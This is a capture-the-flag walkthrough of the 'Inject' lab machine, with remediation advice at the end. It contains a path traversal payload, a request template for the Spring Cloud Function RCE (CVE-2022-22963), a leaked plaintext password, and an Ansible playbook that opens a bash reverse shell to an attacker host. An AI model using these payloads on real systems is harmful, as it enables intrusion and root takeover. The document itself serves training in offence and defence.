Inject (active at the time)
Today we're diving into an analysis of 'Inject', a Linux machine built around a website with file upload capabilities.

'Inject' is an Easy difficulty Linux machine that poses an engaging challenge. It features a website with a hidden twist: a Local File Inclusion (LFI) vulnerability reachable through its file upload function.
Exploiting this vulnerability, we uncover a file system laden with secrets. The key revelation? The web application runs the Spring Cloud Function Web module, susceptible to the notorious CVE-2022-22963 vulnerability.
Our journey through Inject breaches the initial defenses as the 'frank' user, and further exploration reveals a plaintext password for 'phil'. The crowning step is a cronjob running on the machine: by planting a malicious Ansible playbook, we seize a reverse shell as the root user.
Let's start by scanning the IP address we're given, 10.129.38.162, with a standard service scan (something like nmap -sC -sV 10.129.38.162):
// PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.5 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 3072 caf10c515a596277f0a80c5c7c8ddaf8 (RSA)
| 256 d51c81c97b076b1cc1b429254b52219f (ECDSA)
|_ 256 db1d8ceb9472b0d3ed44b96c93a7f91d (ED25519)
8080/tcp open nagios-nsca Nagios NSCA
|_http-title: Home
| http-methods:
|_ Supported Methods: GET HEAD OPTIONS
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Looks like there are only two ports open on this machine. Since HTTP is running on port 8080, I'm going to visit that in the browser.

There aren't many functions available on the site, and sign-up is under construction. Upload has a file upload function that seems to be working, so I'll try it out before fuzzing for directories.

I tried uploading a few different file types containing reverse shell scripts, with some extension spoofing thrown in, but the server rejects everything.

Image Upload
After finding an image we can upload, we're given an Uploaded! message and a link to view our image.


Possible Foothold
The URL looks interesting: the parameter img=Cat03.jpg suggests that the server is using this input to determine which image to display. If the server-side code does not properly sanitize and validate this input, it might be possible to manipulate it to access unintended files. Let's keep digging in this direction. I'm going to fire up Burp Suite and capture my request with the directory traversal payload http://<targetip>:8080/show_image?img=../../../../../../etc/passwd

// <snip>
root:x:0:0:root:/root:/bin/bash
frank:x:1000:1000:frank:/home/frank:/bin/bash
phil:x:1001:1001::/home/phil:/bin/bash
_laurel:x:997:996::/var/log/laurel:/bin/false
<snip>
Awesome, /etc/passwd was leaked, so it looks like we have Local File Inclusion (LFI) here: a vulnerability that allows an attacker to read, and sometimes execute, files on the server through manipulated input, typically by exploiting poorly implemented or unsanitized user input. It can expose sensitive information, enable execution of malicious code, and lead to full system takeover.
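To see why the payload works, here's a minimal sketch. The upload directory shown is an assumption (a plausible path for this app); the mechanics are the same for any web root:

```python
import os

# Hypothetical upload directory; the exact web root doesn't change the
# mechanics, each "../" just walks one directory closer to /.
web_root = "/var/www/WebApp/src/main/uploads"
user_input = "../../../../../../etc/passwd"

# If the server naively joins the img parameter onto its image directory,
# the normalized result escapes the web root entirely:
resolved = os.path.normpath(os.path.join(web_root, user_input))
print(resolved)  # -> /etc/passwd
```

Enough `../` segments will always reach `/`, which is why attackers stack more of them than strictly necessary.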
I did try searching for SSH keys but was unlucky there. So let's look through some user directories using the LFI vulnerability we've discovered. I like to do this from Burp Suite's Repeater so that I'm not rate-limited.
I obviously can't dump the root user's directory, but I can find the user flag in Phil's home directory.

We're on the right track with that flag, but there's nothing else here. Let's move on to Frank, whose home contains a non-standard directory, so I'll keep digging there.

Interesting. Frank has credentials for the user Phil in an XML file, along with what appears to be the location of SSH keys, which I tried to dump earlier without success. I tried again for good measure, but no such luck. Let's keep digging around.
// https://maven.apache.org/xsd/maven-4.0.0.xsd">
<servers>
  <server>
    <id>Inject</id>
    <username>phil</username>
    <password>DocPhillovestoInject123</password>
    <privateKey>${user.home}/.ssh/id_dsa</privateKey>
    <filePermissions>660</filePermissions>
    <directoryPermissions>660</directoryPermissions>
    <configuration></configuration>
  </server>
</servers>
</settings>
We know we're working with a web app, so let's head over to the web root directory. Looks like another non-standard directory. Let's dig!

After a bit of poking around in the /WebApp directory and a lot of reading, I found another XML file: pom.xml contained some interesting information, including frameworks and version numbers.

A quick search on those returned quite a few hits for a Spring Cloud Function RCE vulnerability.
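For context, the kind of pom.xml entry that signals exposure looks something like this (a hypothetical excerpt, not the file's verbatim contents; CVE-2022-22963 affects spring-cloud-function versions up to and including 3.2.2, fixed in 3.2.3 and 3.1.7):

```xml
<!-- hypothetical excerpt: the dependency that matters for CVE-2022-22963 -->
<dependency>
    <groupId>org.springframework.cloud</groupId>
    <artifactId>spring-cloud-function-web</artifactId>
    <version>3.2.2</version>
</dependency>
```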

Time to fire up Metasploit and search for an exploit, to see if we can do this quickly.

I found one that looks pretty promising, and with that we get a shell as frank, quickly migrate over to the user phil, and grab the user.txt flag.
// meterpreter > shell
Process 3770 created.
Channel 1 created.
whoami
frank
su phil
Password: DocPhillovestoInject123
id
uid=1001(phil) gid=1001(phil) groups=1001(phil),50(staff)
<SNIP>
cd home
ls
frank
phil
cd phil
ls
user.txt
cat user.txt
fb5<..snip..>959
After a bit more research into other exploits (in the event Metasploit didn't turn anything up), I found a few Python scripts and manual exploits that can be run through Burp Suite.
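For the curious, the manual route boils down to a single crafted request: on vulnerable spring-cloud-function versions, the routing-expression header is evaluated as a SpEL expression on the server. A sketch that only assembles the request text (target and command are placeholders; nothing is sent here):

```python
# Assembles (does not send) the request shape used by the manual
# CVE-2022-22963 exploits. The header value is a SpEL expression that
# vulnerable spring-cloud-function versions evaluate server-side.
host = "10.129.38.162:8080"  # placeholder target
spel = 'T(java.lang.Runtime).getRuntime().exec("touch /tmp/pwned")'

raw_request = (
    "POST /functionRouter HTTP/1.1\r\n"
    f"Host: {host}\r\n"
    f"spring.cloud.function.routing-expression: {spel}\r\n"
    "Content-Type: text/plain\r\n"
    "Content-Length: 4\r\n"
    "\r\n"
    "data"
)
print(raw_request.splitlines()[0])  # -> POST /functionRouter HTTP/1.1
```

Pasting an equivalent request into Burp's Repeater, with the exec() argument swapped for a reverse shell, is the manual analogue of what the Metasploit module automates.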
Time to priv-esc
Looking for a path to priv-esc, I'll move over linPEAS and pspy. Starting with pspy, I'll transfer the binary from my machine to this box.
// wget http://<yourip>:8000/pspy64
--2023-06-29 22:20:12-- http://10.10.17.139:8000/pspy64
Connecting to 10.10.17.139:8000... connected.
HTTP request sent, awaiting response... 200 OK
Length: 3104768 (3.0M) [application/octet-stream]
Saving to: ‘pspy64’
Make sure to modify permissions so we can execute it: chmod +x pspy64

// CMD: UID=0 PID=6369 | /usr/bin/python3 /root/.ansible/tmp/ansible-tmp-1688077564.006593-6348-44552493765587/AnsiballZ_systemd.py
CMD: UID=0 PID=6370 |
CMD: UID=0 PID=6371 |
CMD: UID=0 PID=6372 | /usr/bin/python3 /usr/bin/ansible-playbook /opt/automation/tasks/playbook_1.yml
CMD: UID=0 PID=6373 | /bin/sh -c /bin/sh -c 'rm -f -r /root/.ansible/tmp/ansible-tmp-1688077564.006593-6348-44552493765587/ > /dev/null 2>&1 && sleep 0'
CMD: UID=0 PID=6374 | rm -f -r /root/.ansible/tmp/ansible-tmp-1688077564.006593-6348-44552493765587/
CMD: UID=0 PID=6375 | /bin/sh -c rm -f -r /root/.ansible/tmp/ansible-tmp-1688077564.006593-6348-44552493765587/ > /dev/null 2>&1 && sleep 0
CMD: UID=0 PID=6378 | /usr/bin/rm -rf /opt/automation/tasks/playbook_1.yml
CMD: UID=0 PID=6379 | /usr/bin/cp /root/playbook_1.yml /opt/automation/tasks/
CMD: UID=0 PID=6388 | /usr/bin/python3 /usr/local/bin/ansible-parallel /opt/automation/tasks/playbook_1.yml
CMD: UID=0 PID=6387 |
CMD: UID=0 PID=6386 | sleep 10
CMD: UID=0 PID=6385 | /bin/sh -c /usr/local/bin/ansible-parallel /opt/automation/tasks/*.yml
CMD: UID=0 PID=6384 | /bin/sh -c /usr/bin/rm -rf /var/www/WebApp/src/main/uploads/*
CMD: UID=0 PID=6383 | /bin/sh -c sleep 10 && /usr/bin/rm -rf /opt/automation/tasks/* && /usr/bin/cp /root/playbook_1.yml /opt/automation/tasks/
CMD: UID=0 PID=6382 | /usr/sbin/CRON -f
CMD: UID=0 PID=6381 | /usr/sbin/CRON -f
CMD: UID=0 PID=6380 | /usr/sbin/CRON -f
CMD: UID=0 PID=6389 | /usr/bin/python3 /usr/bin/ansible-playbook /opt/automation/tasks/playbook_1.yml
CMD: UID=0 PID=6391 |
CMD: UID=0 PID=6392 | /usr/bin/python3 /usr/bin/ansible-playbook /opt/automation/tasks/playbook_1.yml
CMD: UID=0 PID=6393 |
CMD: UID=0 PID=6395 | /usr/bin/python3 /usr/bin/ansible-playbook /opt/automation/tasks/playbook_1.yml
CMD: UID=0 PID=6396 |
CMD: UID=0 PID=6397 | /bin/sh -c /bin/sh -c 'echo ~root && sleep 0'
CMD: UID=0 PID=6398 | sleep 0
CMD: UID=0 PID=6399 |
CMD: UID=0 PID=6400 | /bin/sh -c ( umask 77 && mkdir -p "` echo /root/.ansible/tmp `"&& mkdir "` echo /root/.ansible/tmp/ansible-tmp-1688077682.6851177-6395-137338149153431 `" && echo ansible-tmp-1688077682.6851177-6395-137338149153431="` echo /root/.ansible/tmp/ansible-tmp-1688077682.6851177-6395-137338149153431 `" ) && sleep 0
CMD: UID=0 PID=6403 | /bin/sh -c ( umask 77 && mkdir -p "` echo /root/.ansible/tmp `"&& mkdir "` echo /root/.ansible/tmp/ansible-tmp-1688077682.6851177-6395-137338149153431 `" && echo ansible-tmp-1688077682.6851177-6395-137338149153431="` echo /root/.ansible/tmp/ansible-tmp-1688077682.6851177-6395-137338149153431 `" ) && sleep 0
CMD: UID=0 PID=6401 | /bin/sh -c ( umask 77 && mkdir -p "` echo /root/.ansible/tmp `"&& mkdir "` echo /root/.ansible/tmp/ansible-tmp-1688077682.6851177-6395-137338149153431 `" && echo ansible-tmp-1688077682.6851177-6395-137338149153431="` echo /root/.ansible/tmp/ansible-tmp-1688077682.6851177-6395-137338149153431 `" ) && sleep 0
CMD: UID=0 PID=6405 | /bin/sh -c ( umask 77 && mkdir -p "` echo /root/.ansible/tmp `"&& mkdir "` echo /root/.ansible/tmp/ansible-tmp-1688077682.6851177-6395-137338149153431 `" && echo ansible-tmp-1688077682.6851177-6395-137338149153431="` echo /root/.ansible/tmp/ansible-tmp-1688077682.6851177-6395-137338149153431 `" ) && sleep 0
CMD: UID=0 PID=6407 | sleep 0
CMD: UID=0 PID=6408 |
CMD: UID=0 PID=6409 | /bin/sh -c chmod u+x /root/.ansible/tmp/ansible-tmp-1688077682.6851177-6395-137338149153431/ /root/.ansible/tmp/ansible-tmp-1688077682.6851177-6395-137338149153431/AnsiballZ_setup.py && sleep 0
CMD: UID=0 PID=6410 | chmod u+x /root/.ansible/tmp/ansible-tmp-1688077682.6851177-6395-137338149153431/ /root/.ansible/tmp/ansible-tmp-1688077682.6851177-6395-137338149153431/AnsiballZ_setup.py
CMD: UID=0 PID=6411 | sleep 0
CMD: UID=0 PID=6412 |
CMD: UID=0 PID=6413 | /bin/sh -c /usr/bin/python3 /root/.ansible/tmp/ansible-tmp-1688077682.6851177-6395-137338149153431/AnsiballZ_setup.py && sleep 0
CMD: UID=0 PID=6414 | /usr/bin/python3 /root/.ansible/tmp/ansible-tmp-1688077682.6851177-6395-137338149153431/AnsiballZ_setup.py
CMD: UID=0 PID=6415 |
CMD: UID=0 PID=6418 | file -b /usr/bin/python3.8
Knowing all this, let's take a look at the YAML file located at /opt/automation/tasks/playbook_1.yml and see what it's doing.
phil@inject:~$ cat /opt/automation/tasks/playbook_1.yml
cat /opt/automation/tasks/playbook_1.yml
- hosts: localhost
  tasks:
    - name: Checking webapp service
      ansible.builtin.systemd:
        name: webapp
        enabled: yes
        state: started
This Ansible playbook checks the status of a service named "webapp" on the local host.
The playbook contains one task, "Checking webapp service", which uses the ansible.builtin.systemd module, Ansible's module for managing systemd service units.
The parameters given to the systemd module in this playbook are:
name: webapp is the name of the service this task will manage.
enabled: yes ensures the service is enabled to start at boot.
state: started ensures the service is currently running; if it is not, Ansible will start it.
Overall, the playbook ensures that the "webapp" service is both enabled at boot and currently running on localhost, starting it if necessary.
phil@inject:~$ ls -la /opt/automation/tasks
ls -la /opt/automation/tasks
total 12
drwxrwxr-x 2 root staff 4096 Jul 5 20:16 .
drwxr-xr-x 3 root root 4096 Oct 20 2022 ..
-rw-r--r-- 1 root root 150 Jul 5 20:16 playbook_1.yml
phil@inject:~$ id
id
uid=1001(phil) gid=1001(phil) groups=1001(phil),50(staff)
Looking at the permissions above, the directory is writable by root and the staff group, while the YAML itself is writable only by root. Phil, however, is a member of the staff group. From the pspy output we know the cronjob executes every YAML file in the /opt/automation/tasks directory. The playbook above uses the ansible.builtin.systemd module, and a little searching shows that Ansible also has a shell module. Let's write a new YAML file with the same structure to trigger a reverse shell.
- hosts: localhost
  tasks:
    - name: rev
      shell: bash -c 'bash -i >& /dev/tcp/<YOUR_IP>/4445 0>&1'
Let's save this as playbook2.yml, start up our listener, and copy the file to the /opt/automation/tasks directory.
nc -lvnp 4445
cp playbook2.yml /opt/automation/tasks
Depending on when you copy the file over, you might have to wait a minute or two for the cronjob to fire again. Soon enough, we get our shell as root on our listener.
┌──(sx0tt㉿1337)-[~]
└─$ nc -vlnp 4445
listening on [any] 4445 ...
connect to [10.10.17.139] from (UNKNOWN) [10.129.38.162] 33038
bash: cannot set terminal process group (3594): Inappropriate ioctl for device
bash: no job control in this shell
root@inject:/opt/automation/tasks# ls
ls
playbook_1.yml
root@inject:/opt/automation/tasks# cat /root/root.txt
cat /root/root.txt
3c7<....snip....>c817
Remediation Recommendations
Finding: Local File Inclusion (LFI) vulnerability on the web server exposing user credentials and Spring Cloud version numbers
Priority: Critical
Path Traversal Prevention: Implement mechanisms to block path traversal sequences (such as "../") that let the web application access directories outside of the intended scope. This can be accomplished by maintaining a whitelist of acceptable paths, or by resolving each user-supplied path and validating that it stays inside the intended directory.
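A minimal sketch of the resolve-and-validate approach (directory and filenames are illustrative): normalize the joined path and serve it only if it still sits inside the intended directory.

```python
import os

UPLOAD_ROOT = "/var/www/WebApp/src/main/uploads"  # illustrative web root

def safe_resolve(user_path):
    """Return the resolved path only if it stays inside UPLOAD_ROOT."""
    candidate = os.path.normpath(os.path.join(UPLOAD_ROOT, user_path))
    if candidate.startswith(UPLOAD_ROOT + os.sep):
        return candidate
    return None  # traversal attempt: refuse to serve

print(safe_resolve("Cat03.jpg"))                     # served
print(safe_resolve("../../../../../../etc/passwd"))  # None
```

Combined with a filename whitelist or database lookup, this closes the `img=` traversal used in this walkthrough.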
File Permissions: Reevaluate and tighten the file permissions on the web server. Sensitive files such as those containing user credentials should not be readable by the web server process.
Data Encryption: Encrypt sensitive data like user credentials, and only decrypt this information when necessary. Avoid storing plaintext credentials, using secure methods such as one-way hashes with a salt.
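A minimal sketch of salted one-way hashing using only Python's standard library (the scrypt parameters here are illustrative, not a tuned recommendation):

```python
import hashlib
import hmac
import os

def hash_password(password):
    # Random per-user salt; store salt + digest, never the password itself.
    salt = os.urandom(16)
    digest = hashlib.scrypt(password.encode(), salt=salt, n=2**14, r=8, p=1)
    return salt, digest

def verify_password(password, salt, digest):
    candidate = hashlib.scrypt(password.encode(), salt=salt, n=2**14, r=8, p=1)
    return hmac.compare_digest(candidate, digest)  # constant-time compare

salt, digest = hash_password("DocPhillovestoInject123")
print(verify_password("DocPhillovestoInject123", salt, digest))  # True
print(verify_password("wrong-guess", salt, digest))              # False
```

Had the settings.xml credential been stored this way, the LFI would have leaked a salt and digest rather than a working password.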
Software Version Management: Conceal version information for software like Spring Cloud. Detailed version information may be used by attackers to exploit known vulnerabilities associated with specific versions.
Regular Updates & Patch Management: Keep all systems, applications, and plugins updated with the latest patches. Regularly update Spring Cloud and other frameworks, as new versions often include security enhancements and vulnerability fixes.

Finding: Reverse shell payload execution using an Ansible playbook due to directory ownership by a privileged user
Least Privilege for Scheduled Tasks: Do not give unprivileged groups (here, staff) write access to directories whose contents are executed by root. Restrict /opt/automation/tasks to root, or run the cronjob as a dedicated low-privilege user.